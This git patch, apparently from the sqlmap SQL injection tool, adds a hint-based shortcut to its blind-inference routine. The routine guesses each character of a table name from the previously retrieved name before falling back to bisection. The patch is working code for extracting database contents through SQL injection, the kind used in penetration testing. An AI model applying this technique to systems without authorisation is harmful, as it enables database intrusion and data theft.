From 17554759b7ebcae907ce0a67454c7a5563df9245 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 15 Apr 2010 09:36:13 +0000
Subject: [PATCH] implemented feature request from Ole Rasmussen regarding
 table name retrieval speedup

---
 lib/core/option.py                |  1 +
 lib/techniques/blind/inference.py | 24 ++++++++++++++++++++++++
 plugins/generic/enumeration.py    |  1 +
 3 files changed, 26 insertions(+)

diff --git a/lib/core/option.py b/lib/core/option.py
index 329c0773f..702d1f342 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -920,6 +920,7 @@ def __setKnowledgeBaseAttributes():
     kb.injParameter   = None
     kb.injPlace       = None
     kb.injType        = None
+    kb.hintValue      = None
 
     # Back-end DBMS underlying operating system fingerprint via banner (-b)
     # parsing
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 3aaa8f004..047ca19d4 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -114,7 +114,31 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 
     queriesCount = [0]    # As list to deal with nested scoping rules
 
+    hintlock  = threading.Lock()
+    def tryHint(idx):
+        hintlock.acquire()
+        hintValue = kb.hintValue
+        hintlock.release()
+        if hintValue and len(hintValue) >= idx:
+            if kb.dbms == "SQLite":
+                posValue = hintValue[idx-1]
+            else:
+                posValue = ord(hintValue[idx-1])
+
+            forgedPayload = safeStringFormat(payload.replace('%3E', '%3D'), (expressionUnescaped, idx, posValue))
+            result        = Request.queryPage(urlencode(forgedPayload))
+            if result:
+                return hintValue[idx-1]
+        hintlock.acquire()
+        kb.hintValue = None
+        hintlock.release()
+        return None
+
     def getChar(idx, asciiTbl=asciiTbl):
+        result = tryHint(idx)
+        if result:
+            return result
+
         maxValue = asciiTbl[len(asciiTbl)-1]
         minValue = 0
 
diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py
index 777f49f4c..c4a515281 100644
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@@ -783,6 +783,7 @@ class Enumeration:
                         query = rootQuery["blind"]["query"] % (db, index)
                     table = inject.getValue(query, inband=False)
                     tables.append(table)
+                    kb.hintValue = table
 
                 if tables:
                     kb.data.cachedTables[db] = tables